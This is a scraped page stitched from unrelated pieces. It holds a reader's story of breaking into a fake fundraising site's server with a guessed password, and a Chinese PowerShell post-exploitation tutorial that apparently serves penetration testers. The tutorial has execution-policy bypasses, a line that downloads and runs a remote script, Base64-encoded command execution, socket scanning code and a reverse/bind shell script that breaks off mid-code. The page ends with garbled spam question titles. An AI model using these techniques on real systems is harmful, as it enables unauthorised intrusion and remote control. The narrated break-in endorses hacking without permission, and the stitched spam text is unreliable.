&/p&&figure&&img src=&https://pic2.zhimg.com/v2-ae96781530_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&413& data-rawheight=&736& class=&content_image& width=&413&&&/figure&&p&正要给癌症小孩捐款,突然发现收款方居然不是轻松筹的官方名称,而一个和官方商户名称相近的名字。&/p&&p&&br&&/p&&p&这让我产生了怀疑,首页没什么疑点,可疑的是点击其他按钮的时候居然没反应。&/p&&p&&br&&/p&&p&当我观察了网址方才发现域名并不是官方的域名,让我断定这就是假的轻松筹!&/p&&p&&br&&/p&&p&为求真相,我开始对目标进行探究。&/p&&p&&br&&/p&&p&我利用计算机基础知识对该网址进行了分析,试了很多种常用的方法都是以失败告终。&/p&&p&&br&&/p&&p&无奈之下,居然想出了一个成功率连1%都不到的方法。&/p&&p&&br&&/p&&p&然而一切因此柳暗花明,我追踪到一个香港的IP,而服务器端口的密码被我用QAZxsw连进去了!&/p&&p&&br&&/p&&p&最终我在后台看到了真相。&/p&&figure&&img src=&https://pic1.zhimg.com/v2-9f2d21f4acaae5bb28a29c89effc047b_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&640& data-rawheight=&456& class=&origin_image zh-lightbox-thumb& width=&640& data-original=&https://pic1.zhimg.com/v2-9f2d21f4acaae5bb28a29c89effc047b_r.jpg&&&/figure&&p&&br&&/p&&p&果然所有的数据都是假的。&/p&&p&&br&&/p&&p&对方很是谨慎,完成一个项目就立刻删除,所有的资金都流入公众号的支付平台内,外界无从得知他们究竟“筹”到了多少钱,不知道各位读者里可有人上过当。&/p&&p&&br&&/p&&p&到此就告一段落了,可能大家觉得我没有及时发布而且有部分图片也没有,因为过去那么久所留下的图片也是找了好久才找到的,而且我最近才知道有一本黑。&/p&&p&&br&&/p&&p&现在告诉你们应该也不迟,如果你们觉得有用的话,后续我会继续公布一些黑产界不为人知的秘密,也请各位读者能将这些危害社会的手段告知给身边的人,文笔拙劣,各位见笑。&/p&&p&&br&&/p&&p&最后,谢谢一本黑给我机会能把这些藏在心里的秘密大白天下。&/p&&p&&br&&/p&&p&振宇:志同道合,何需言谢。&/p&
文/读者投稿(微信公众号:一本黑) 责编/振宇、东东【一本黑】媒体或商业转载必须获得授权,个人转发朋友圈无需授权。 当你知道了太多事实,你就会觉得目之所及的各种新闻都是一种虚假说辞,让我意识到一本黑不只要揭黑,更要维护事件的真貌。 这次的推文…
&figure&&img src=&https://pic3.zhimg.com/v2-ffcff098dda20_b.jpg& data-rawwidth=&1024& data-rawheight=&616& class=&origin_image zh-lightbox-thumb& width=&1024& data-original=&https://pic3.zhimg.com/v2-ffcff098dda20_r.jpg&&&/figure&&p&作者:香山&/p&&p&预估稿费:800RMB&/p&&p&&b&(本篇文章享受双倍稿费 活动链接请&a href=&http://link.zhihu.com/?target=http%3A//bobao.360.cn/news/detail/4370.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&点击此处&/a&)&/b&&/p&&p&投稿方式:发送邮件至linwei#&a href=&http://link.zhihu.com/?target=http%3A//360.cn& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&360.cn&/span&&span class=&invisible&&&/span&&/a&,或登陆网页版在线投稿&/p&&p&&br&&/p&&p&&b&此为Powershell攻击指南——黑客后渗透之道系列的第一篇基础篇。此后每两天更新一篇,敬请期待!&/b&&/p&&p&&br&&/p&&h2&前言&/h2&&blockquote&一段时间以来研究Powershell,后来应朋友们对Powershell的需求,让我写一个Powershell安全入门或者介绍方面的文章,所以这篇文章就出现了。但又因为各种各样的事情搞得有些拖延,同时作者文笔不好,文章可能有不流畅的地方,还请多多见谅。这里做一些总结,来让新人对此有个大致了解,能对Powershell或是内网有更多的理解。开始之前也要感谢红线安全团队的资深安全专家&a href=&http://link.zhihu.com/?target=http%3A//triplekill.org/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&@城哥&/a&和朋友&a href=&http://link.zhihu.com/?target=http%3A//blog.exist1ng.com/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&x403258&/a&在我写文过程中的帮助。&br&那么开始之前我们先来思考一下powershell一个常见的问题,那么我们知道powershell的后缀是ps1,哪为什么是ps1而不是ps2,ps3呢?那么理解这个问题呢我们可以看看powershell的特性,powershell是对下完全兼容的,也就是说你使用powershell 5.x的版本来执行powershell v1.0的代码也是完全没有问题的。那么我个人理解一下为什么是ps1,可以这么说,当我们见到ps2后缀之时就是powershell进行大的更新,也就是不对下兼容的时候,所以这里一直是使用ps1后缀。&br&那么对于我们的安全人员来说我们用什么版本呢?毫无疑问是v2,为什么呢,应为在win7当中默认安装了v2,而且之后的版本都是兼容v2的,v1版本所有的功能对于我们的需求很多都不能满足,所以v2成为了我们目前来说独一无二的选择,通过下面的方式我们可以看到我们的powershell的版本与一些详细的信息,后面我们的代码,大多都是以v2.0来讨论的。&/blockquote&&p&&code&Get-Host&/code&&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&Name
: ConsoleHost
InstanceId
: -35cd-4bba-bedb-cf00d2a39389
: System.Management.Automation.Internal.Host.InternalHostUserInterface
CurrentCulture
CurrentUICulture : en-US
PrivateData
: Microsoft.PowerShell.ConsoleHost+ConsoleColorProxy
IsRunspacePushed : False
: System.Management.Automation.Runspaces.LocalRunspace
&/code&&/pre&&/div&&p&对于安全人员学习ps主要有以下两个场景:&/p&&ol&&li&第一种我们需要获得免杀或者更好的隐蔽攻击对方的win机器,可以通过钓鱼等方式直接执行命令&/li&&li&第二种我们已经到了对方网络,再不济也是一台DMZ的win-server,那么我们利用ps做的事情那么自然而然的是对内网继续深入&/li&&/ol&&p&那么本powershell系列主要是内容涉及和安全测试相关的内容,所以面向的读者主要是安全或者运维人员,不管你是在网络世界中扮演什么角色,在这里应该是能收获到你想要的。文章主要包含下面一些内容:&/p&&ol&&li&powershell基础语法&/li&&li&powershell脚本编写与调用执行&/li&&li&powershell的Socket编程&/li&&li&powershell端口扫描与服务爆破&/li&&li&powershell多线程&/li&&li&powershell操作wmi&/li&&li&powershell操作win32API&/li&&li&powershell操作Dll注入&shellcode注入&exe注入&/li&&li&powershell混淆&/li&&li&powershell事件日志&/li&&li&powershell实例使用场景&/li&&li&Powershell渗透工具集&/li&&/ol&&h2&powershell(2)-基础&/h2&&blockquote&本节主要讲一下关于powershell一些简单的基础知识,推荐网站&a href=&http://link.zhihu.com/?target=http%3A//www.pstips.net/& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://www.&/span&&span class=&visible&&pstips.net/&/span&&span class=&invisible&&&/span&&/a&学习Powershell的一些基础知识这里是一些简单的基础,写的可能有些简陋,这里可能需要你有一些编程语言的基础就能看懂啦,这里对于后面的代码分析是非常有用的,所以还是希望大家简单的浏览一下基础知识。&/blockquote&&h2&变量&/h2&&p&变量都是以&code&$&/code&开头, 是强类型语言, 语言是大小写不敏感的&/p&&p&提一提变量保护与常量的声明:&code&New-Variable num -Value 100 -Force -Option readonly&/code&这样就得到一个受保护的变量&code&$num&/code&,如果要销毁它只能通过&code&del $num&/code&删除。如果要声明常量则用&code&New-Variable num -Value 100 -Force -Option readonlyNew-Variable num -Value 100 -Force -Option constant&/code&&/p&&h2&数组&/h2&&h2&数组的创建:&/h2&&p&数组的创建可以通过下面五种方式来创建,在适当的条件下选择适当的方式创建即可&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&$array = 1,2,3,4
$array = 1..4
$array=1,&2017&,([System.Guid]::NewGuid()),(get-date)
$a=,&1& # 一个元素的数组
&/code&&/pre&&/div&&h2&数组的访问&/h2&&p&数组的访问和C类似,第一位元素实用下标0来访问即&code&$array[0]&/code&,我们来看看ipconfig获取到的数据&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&$ip = ipconfig
$ip[1] # 获取ipconfig第二行的数据
&/code&&/pre&&/div&&h2&数组的判断&/h2&&p&&code&$test -is [array]&/code&&/p&&h2&数组的追加:&/h2&&p&&code&$books += &元素4&&/code&&/p&&h2&哈希表&/h2&&h2&哈希表的创建:&/h2&&p&&code&$stu=@{ Name = &test&;Age=&12&;sex=&man& }&/code&&/p&&h2&哈希表里存数组:&/h2&&p&&code&$stu=@{ Name = &hei&;Age=&12&;sex=&man&;Books=&kali&,&sqlmap&,&powershell& }&/code&&/p&&h2&哈希表的插入与删除:&/h2&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&$Student=@{}
$Student.Name=&hahaha&
$stu.Remove(&Name&)
&/code&&/pre&&/div&&h2&对象&/h2&&p&在powershell中一切都可以视为对象,包罗万象New-Object可以创建一个对象Add-Member可以添加属性和方法&/p&&h2&控制语句&/h2&&h2&条件判断&/h2&&h2&比较运算符&/h2&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&-eq :等于
-ne :不等于
-gt :大于
-ge :大于等于
-lt :小于
-le :小于等于
-contains :包含
$array -contains something
-notcontains :不包含
!($a): 求反
-xor :异或
&/code&&/pre&&/div&&h2&if-else&/h2&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&if-else:
if($value -eq 1){
&/code&&/pre&&/div&&h2&循环语句&/h2&&h2&while&/h2&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&while($n -gt 0){
&/code&&/pre&&/div&&h2&for&/h2&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&$sum=0
for($i=1;$i -le 100;$i++)
&/code&&/pre&&/div&&h2&foreach&/h2&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&# 打印出windows目录下大于1mb的文件名
foreach($file in dir c:windows)
if($file.Length -gt 1mb)
$File.Name
&/code&&/pre&&/div&&h2&foreach-object&/h2&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&# 获取所有的服务,并获取对呀进程ID是否大于100
Get-WmiObject Win32_Service | ForEach-Object {&Name:&+ $_.DisplayName, &, Is ProcessId more than 100:& + ($_.ProcessId -gt 100)}
&/code&&/pre&&/div&&h2&函数&/h2&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&function Invoke-PortScan {
.DESCRIPTION
.PARAMETER StartAddress
.PARAMETER EndAddress
PS & Invoke-PortScan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254
&/code&&/pre&&/div&&h2&异常处理&/h2&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&Try{
$connection.open()
$success = $true
$success = $false
&/code&&/pre&&/div&&h2&Powershell(3)-脚本执行基础&/h2&&h2&开始之前&/h2&&p&我们在开始之前先来介绍在windows平台中常用到的几种脚本&/p&&h2&Bat&/h2&&p&这就是我们常用的Bat脚本,全名为批处理文件,脚本中就是我们在CMD中使用到的命令,这里提一个小问题:CMD的命令行执行命令的优先级是&code&.bat & .exe&/code&,那么假如我放一个cmd.bat在system32目录下,那么优先执行的是cmd.bat,这里面的内容就变得不可描述起来了&/p&&h2&VBscript&/h2&&p&执行vbs就是常说的vbscript,是微软为了方便自动化管理windows而推出的脚本语言,这里了解一下即可,不是文章重点。&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&一个小例子通过vbs操作WMI
Set wmi = GetObject(&winmgmts:&)
Set collection = wmi.ExecQuery(&select * from Win32_Process&)
For Each process in collection
WScript.Echo process.getObjectText_
&/code&&/pre&&/div&&h2&Powershell&/h2&&p&这就是我们的主角,在现在和未来一定是powershell占据主要地位(对于这一点搞Win多一点的朋友一定不会怀疑),首先我们来看一个简单的例子&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&script.ps1:
# 脚本内容
function test-conn { Test-Connection
-Count 2 -ComputerName $args}
# 载入脚本文件
.script.ps1
# 调用函数
test-conn localhost
&/code&&/pre&&/div&&h2&Powershell执行策略&/h2&&p&那么你可能会在调用脚本的时候出现报错,这是powershell的安全执行策略,下面我们来了解一下执行策略:PowerShell 提供了 Restricted、AllSigned、RemoteSigned、Unrestricted、Bypass、Undefined 六种类型的执行策略简单介绍各种策略如下:&/p&&p&名称说明Restricted受限制的,可以执行单个的命令,但是不能执行脚本Windows 8, Windows Server 2012, and Windows 8.1中默认就是这种策略,所以是不能执行脚本的,执行就会报错,那么如何才能执行呢?Set-ExecutionPolicy -ExecutionPolicy Bypass就是设置策略为Bypass这样就可以执行脚本了。AllSignedAllSigned 执行策略允许执行所有具有数字签名的脚本RemoteSigned当执行从网络上下载的脚本时,需要脚本具有数字签名,否则不会运行这个脚本。如果是在本地创建的脚本则可以直接执行,不要求脚本具有数字签名。Unrestricted这是一种比较宽容的策略,允许运行未签名的脚本。对于从网络上下载的脚本,在运行前会进行安全性提示。需要你确认是否执行脚本BypassBypass 执行策略对脚本的执行不设任何的限制,任何脚本都可以执行,并且不会有安全性提示。UndefinedUndefined 表示没有设置脚本策略。当然此时会发生继承或应用默认的脚本策略。&/p&&p&那么我们如何绕过这些安全策略呢?下面提供几种方法,网上还有很多的绕过方法,大家可以自行研究:&/p&&p&名称说明Get-ExecutionPolicy获取当前的执行策略Get-Content .test.ps1 | powershell.exe -noprofile –通过管道输入进pspowershell -nop -c “iex(New-Object Net.WebClient).DownloadString(‘&a href=&http://link.zhihu.com/?target=http%3A//192.168.1.2/test.ps1& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&192.168.1.2/test.ps1&/span&&span class=&invisible&&&/span&&/a&‘)”通过远程下载脚本来绕过|bytes = [System.Text.Encoding]::Unicode.GetBytes(encodedCommand =[Convert]::ToBase64String(encodedCommand|通过BASE64编码执行|&/p&&h2&powershell的脚本调用方法:&/h2&&ol&&li&如果脚本是直接写的代码而不是只定义了函数那么直接执行脚本.script.ps1即可&/li&&li&但是如果是载入里面的函数需要&code&.+空格+.script.ps1&/code&&/li&&li&或者使用Import-Module .script.ps1, 这样才能直接使用脚本的函数&/li&&/ol&&h2&通过控制台执行Powershell&/h2&&p&对于我们安全测试人员通常获取到的一个Shell是CMD的, 那么我们想要尽可能少的操作就可以直接通过控制台来执行powershell的命令, 那么先来看一个简单的例子:&/p&&p&&br&&/p&&figure&&img src=&https://pic4.zhimg.com/v2-4fe30bbb5d3d_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1334& data-rawheight=&616& class=&origin_image zh-lightbox-thumb& width=&1334& data-original=&https://pic4.zhimg.com/v2-4fe30bbb5d3d_r.jpg&&&/figure&&p&&br&&/p&&p&可以看到我们通过CMD界面执行了Powershell的代码, 那么其实这样的执行方式在真实的安全测试环境中利用更多, 下面是一个Powershell通过这种方式执行的所有可选的参数:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&PowerShell[.exe]
[-PSConsoleFile &file& | -Version &version&]
[-EncodedCommand &Base64EncodedCommand&]
[-ExecutionPolicy &ExecutionPolicy&]
[-File &filePath& &args&]
[-InputFormat {Text | XML}]
[-NonInteractive]
[-NoProfile]
[-OutputFormat {Text | XML}]
[-WindowStyle &style&]
[-Command { - | &script-block& [-args &arg-array&]
| &string& [&CommandParameters&] } ]
PowerShell[.exe] -Help | -? | /?
&/code&&/pre&&/div&&p&名称解释-Command需要执行的代码-ExecutionPolicy设置默认的执行策略,一般使用Bypass-EncodedCommand执行Base64代码-File这是需要执行的脚本名-NoExit执行完成命令之后不会立即退出,比如我们执行powerhsell whoami 执行完成之后会推出我们的PS会话,如果我们加上这个参数,运行完之后还是会继续停留在PS的界面-NoLogo不输出PS的Banner信息-Noninteractive不开启交互式的会话-NoProfile不使用当前用户使用的配置文件-Sta以单线程模式启动ps-Version设置用什么版本去执行代码-WindowStyle设置Powershell的执行窗口,有下面的参数Normal, Minimized, Maximized, or Hidden&/p&&p&最后举一个执行Base64代码的例子:&/p&&ol&&li&我们先试用上面一个表格提到的编码代码编码命令&code&whoami&/code&, 得到字符串:&code&dwBoAG8AYQBtAGkACgA=&/code&&/li&&li&通过下面的命令来执行代码&/li&&/ol&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&powershell -EncodedCommand dwBoAG8AYQBtAGkACgA=
&/code&&/pre&&/div&&p&&br&&/p&&figure&&img src=&https://pic1.zhimg.com/v2-b577e41bc06b57dd77a43b7cd827b9ac_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1142& data-rawheight=&100& class=&origin_image zh-lightbox-thumb& width=&1142& data-original=&https://pic1.zhimg.com/v2-b577e41bc06b57dd77a43b7cd827b9ac_r.jpg&&&/figure&&p&&br&&/p&&p&那么这种需求在什么地方呢? 比如我们的代码特别长或者会引起一起歧义的时候就需要我们使用这种方式去执行, 同时也是一个混淆的方式。&/p&&h2&Powershell(4)-Socket网络编程&/h2&&blockquote&这一小节我们介绍Powershell中的Socket编程,网络编程是所有语言中绕不开的核心点,下面我们通过对代码的分析来让大家对PS中的Socket有一个初步的了解。&/blockquote&&h2&Socket-Tcp编程&/h2&&p&开始之前我们先想想为什么要学习socket编程,那么最直观的是端口扫描,那么还有可能是反弹shell之类的应用。进行Socket编程只需要调用.Net框架即可,这里先使用TCP来示例:&/p&&p&这里是去打开一个TCP连接到本地的21端口,并获取21端口返回的Banner信息,其中GetOutput函数看不了可以先不看,其用来获取stream中的数据,主要看Main函数内容:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&Tcp-Demo.ps1
function GetOutput
## 创建一个缓冲区获取数据
$buffer = new-object System.Byte[] 1024
$encoding = new-object System.Text.AsciiEncoding
$outputBuffer = &&
$findMore = $false
## 从stream读取所有的数据,写到输出缓冲区
start-sleep -m 1000
$findmore = $false
# 读取Timeout
$stream.ReadTimeout = 1000
$read = $stream.Read($buffer, 0, 1024)
if($read -gt 0){
$findmore = $true
$outputBuffer += ($encoding.GetString($buffer, 0, $read))
} catch { $findMore = $ $read = 0 }
} while($read -gt 0)
} while($findmore)
$outputBuffer
function Main{
# 定义主机和端口
$remoteHost = &127.0.0.1&
$port = 21
# 定义连接Host与Port
$socket = new-object System.Net.Sockets.TcpClient($remoteHost, $port)
# 进行连接
$stream = $socket.GetStream()
# 获取Stream
$writer = new-object System.IO.StreamWriter $stream
# 创建IO对象
$SCRIPT:output += GetOutput
# 声明变量
if($output){
foreach($line in $output.Split(&`n&))
write-host $line
$SCRIPT:output = &&
&/code&&/pre&&/div&&p&我们来看看输出结果:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&PS C:UsersrootclayDesktoppowershell& . .Tcp-Demo.ps1
220 Microsoft FTP Service
&/code&&/pre&&/div&&p&这样就打开了21端口的连接,并且获取到了21端口的banner信息。那么有过端口扫描编写的朋友肯定已经看到了,这种方式是直接打开连接,并不能获取到一些需要发包才能返回banner的端口信息,典型的80端口就是如此,我们需要给80端口发送特定的信息才能得到Response, 当然还有许多类似的端口,比如3389端口, 下面我们来看看我们如何使用powershell实现这项功能.&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&Tcp-Demo2.ps1
function GetOutput
... # 代码和上面的一样
function Main{
# 定义主机和端口
$remoteHost = &127.0.0.1&
$port = 80
# 定义连接Host与Port
$socket = new-object System.Net.Sockets.TcpClient($remoteHost, $port)
# 进行连接
$stream = $socket.GetStream()
# 获取Stream
$writer = new-object System.IO.StreamWriter $stream
# 创建IO对象
$SCRIPT:output += GetOutput
# 声明变量, userInput为要发包的内容,这里我们需要发送一个GET请求给Server
$userInput = &GET / HTTP/1.1 `nHost: localhost
# 定义发包内容
foreach($line in $userInput)
# 发送数据
$writer.WriteLine($line)
$writer.Flush()
$SCRIPT:output += GetOutput
if($output){
foreach($line in $output.Split(&`n&))
write-host $line
$SCRIPT:output = &&
&/code&&/pre&&/div&&p&我们来看看输出:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&PS C:UsersrootclayDesktoppowershell& . .Tcp-Demo2.ps1
HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: &5e26ec16b73ad31:0&
Server: Microsoft-IIS/7.5
Content-Length: 689
&!DOCTYPE html PUBLIC &-//W3C//DTD XHTML 1.0 Strict//EN& &http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd&&
&html xmlns=&http://www.w3.org/1999/xhtml&&
&meta http-equiv=&Content-Type& content=&text/ charset=iso-8859-1& /&
&title&IIS7&/title&
&style type=&text/css&&
&/code&&/pre&&/div&&p&我们下面对这项功能进行一个整合:我们可以发包给一个端口,也可以直接连接一个端口,这里已经实现TCP,http,https三种常见协议的访问&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&########################################
## Tcp-Request.ps1
## Example1:
## $http = @&
## GET / HTTP/1.1
## Host:127.0.0.1
## `n 在Powershell中代表换行符
## $http | .Tcp-Request localhost
## Example2:
## .Tcp-Request localhost 80
########################################
## 管理参数输入param()数组
[string] $remoteHost = &localhost&,
[int] $port = 80,
[switch] $UseSSL,
[string] $inputObject,
[int] $commandDelay = 100
[string] $output = &&
## 获取用户输入模式
$currentInput = $inputObject
if(-not $currentInput)
$SCRIPT:currentInput = @($input)
# 脚本模式开关, 如果脚本能读取到输入, 使用发包模式, 如果没有输入使用TCP直连模式
$scriptedMode = [bool] $currentInput
function Main
## 打开socket连接远程机器和端口
if(-not $scriptedMode)
write-host &Connecting to $remoteHost on port $port&
## 异常追踪
trap { Write-Error &Could not connect to remote computer: $_&; exit }
$socket = new-object System.Net.Sockets.TcpClient($remoteHost, $port)
if(-not $scriptedMode)
write-host &Connected. Press ^D(Control + D) followed by [ENTER] to exit.`n&
$stream = $socket.GetStream()
## 如果有SSl使用SSLStream获取Stream
if($UseSSL)
$sslStream = New-Object System.Net.Security.SslStream $stream,$false
$sslStream.AuthenticateAsClient($remoteHost)
$stream = $sslStream
$writer = new-object System.IO.StreamWriter $stream
while($true)
## 获取得到的Response结果
$SCRIPT:output += GetOutput
## 如果我们使用了管道输入的模式,我们发送我们的命令,再接受输出,并退出
if($scriptedMode)
foreach($line in $currentInput)
$writer.WriteLine($line)
$writer.Flush()
Start-Sleep -m $commandDelay
$SCRIPT:output += GetOutput
## 如果没有使用事先管道输入的模式直接读取TCP回包
if($output)
# 逐行输出
foreach($line in $output.Split(&`n&))
write-host $line
$SCRIPT:output = &&
## 获取用户的输入,如果读取到^D就退出
$command = read-host
if($command -eq ([char] 4)) { }
$writer.WriteLine($command)
$writer.Flush()
## Close the streams
$writer.Close()
$stream.Close()
## 如果我们使用了管道输入的模式,这里输出刚才读取到服务器返回的数据
if($scriptedMode)
## 获取远程服务器的返回数据
function GetOutput
## 创建一个缓冲区获取数据
$buffer = new-object System.Byte[] 1024
$encoding = new-object System.Text.AsciiEncoding
$outputBuffer = &&
$findMore = $false
## 从stream读取所有的数据,写到输出缓冲区
start-sleep -m 1000
$findmore = $false
$stream.ReadTimeout = 1000
$read = $stream.Read($buffer, 0, 1024)
if($read -gt 0)
$findmore = $true
$outputBuffer += ($encoding.GetString($buffer, 0, $read))
} catch { $findMore = $ $read = 0 }
} while($read -gt 0)
} while($findmore)
$outputBuffer
&/code&&/pre&&/div&&p&那么至此我们已经完成了对TCP端口的打开并获取对应的信息,其中很多的关键代码释义我已经详细给出,我们主要以TCP为例,由于UDP应用场景相对于TCP较少,关于UDP的编写可自行编写。这个脚本加以修改就是一个Powershell完成的扫描器了,端口扫描器我们放在下一节来分析,我们这里最后看一个反弹shell的ps脚本, 同样在注释中详细解释了代码块的作用。&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&function TcpShell{
.DESCRIPTION
一个简单的Shell连接工具, 支持正向与反向
.PARAMETER IPAddress
Ip地址参数
.PARAMETER Port
反向连接模式
PS & TcpShell -Reverse -IPAddress 192.168.254.226 -Port 4444
正向连接模式
PS & TcpShell -Bind -Port 4444
IPV6地址连接
PS & TcpShell -Reverse -IPAddress fe80::20c:29ff:fe9d:b983 -Port 4444
# 参数绑定
[CmdletBinding(DefaultParameterSetName=&reverse&)] Param(
[Parameter(Position = 0, Mandatory = $true, ParameterSetName=&reverse&)]
[Parameter(Position = 0, Mandatory = $false, ParameterSetName=&bind&)]
$IPAddress,
[Parameter(Position = 1, Mandatory = $true, ParameterSetName=&reverse&)]
[Parameter(Position = 1, Mandatory = $true, ParameterSetName=&bind&)]
[Parameter(ParameterSetName=&reverse&)]
[Parameter(ParameterSetName=&bind&)]
# 如果检测到Reverse参数,开启反向连接模式
if ($Reverse)
$client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)
# 使用正向的连接方式, 绑定本地端口, 用于正向连接
if ($Bind)
# Tcp连接监听服务端
$server = [System.Net.Sockets.TcpListener]$Port
# Tcp连接开始
$server.start()
# Tcp开始接受连接
$client = $server.AcceptTcpClient()
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
# 返回给连接的用户一个简单的介绍,目前是使用什么的用户来运行powershell的, 并打印powershell的banner信息
$sendbytes = ([text.encoding]::ASCII).GetBytes(&Windows PowerShell running as user & + $env:username + & on & + $env:computername +
&`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n&)
$stream.Write($sendbytes,0,$sen}
我要回帖
更多推荐
- ·excel表格如何excel计算两个日期相隔天数日期?
- ·第(1)题python输出语句printt(data[pos][0],data[pos][1])有什么作用?
- ·人工智能培训机构哪个好靠谱吗?
- ·二恶英的产生途径有哪些是什么 二恶英的产生途径有哪些是怎么产生的
- ·中国有哪些清真回民的节日分别是几号?
- ·这是什么滴滴充值卡能送人吗,能用吗
- ·不能一辉复古传奇wwWttt881CoM正常啊 ,如何发现ttt881差不多的
- ·为什么我的王者荣耀貂蝉大招得大招和别人的颜色不一样
- ·不能恢复正常 英文wwWeee877CoM正常啊,在什么地方eee877能找到
- ·道底wwWg5mz如何解决,是否g5mzCoM能再恢复
- ·王者荣耀花木兰新皮肤免费得花木兰的激活码是什么
- ·人家钓鱼都在河边,你爬树做什么倩女幽魂手游手游情义春秋
- ·本就不能wwWthelortone c40CoM登入了,还可以继续thelortone c40收视的
- ·基本上可以ppp60确定的是,以后我确定我再也不爱你能收视wwWppp60CoM节目了
- ·开心水族箱下载每天可以通过摸宝获得多少贝币?
- ·求徽章战士gba中文版9锹形虫版cia
- ·建筑物能自助修复的红警 进入建筑物游戏有哪些
- ·不是网咯的RKRK11妨碍司法公正,那是为啥wwWRKRK11CoM登不上网页的
- ·差不多的wwWhzsdaj是什么,刚刚chrome浏览器的hzsdajcOm怎么不显示了
- ·基本上可以ooxx12确定的是,以后再也不能收视wwWooxx12CoM节目了
- ·不是www网咯的298dd故障,那是为啥298dd灯不上www.211dd.com网址页的
- ·不确定什么wWwwww.dandanlu.comus原因,照成的还有www.dandanlu.com其他的cOm介入点吗
- ·有人带我火影忍者带秘境多少钱安卓手q21层秘境吗,没有我待会再来问一百次
- ·经过www.ssczx98.com前几日的状况来看,却定是wwWwww.ssczx98.comCom不能在收视了
- ·不确定WWW是不是2323wanpp不行了,难道是变到2323wanpp呗用的登陆地紫com了,还是怎么
- ·差不多的wwW51luguandongtaitu是什么,刚刚浏览的51luguandongtaitucOm怎么不显示了
- ·道底wwWddd345如何小米智能家居解决方案,是否ddd345CoM能再恢复
- ·这个游戏白嫖是什么意思啊游戏啊?
- ·不确定890na什么原因,照成的还有www890nacom其他的介入点吗
- ·b75 d3v主板b75主板最高配什么cpuu好?,价格便宜一点就可以了。玩dnf开两个刷图而已。
- ·不确定www.733gg.com是什么com导致的,老是访问wwwwww.733gg.comcom出错
- ·登入的时候wwWtwinings earl greybox弹出的播放页被拦截CoM啦twinings earl greybox在安全沙箱了
- ·谁有方舟生存进化免费下载全速下载的链接?
- ·全民K歌家族基金章程章程
- ·怎么wwWhebei.iabe.cnwq没来通知,呈经经常收视的hebei.iabe.cnwqcOm也出问题了
- ·不清楚是哪位1122WE不道德的礼物 电影,朋友又wwW1122WECoM开始举抱啦
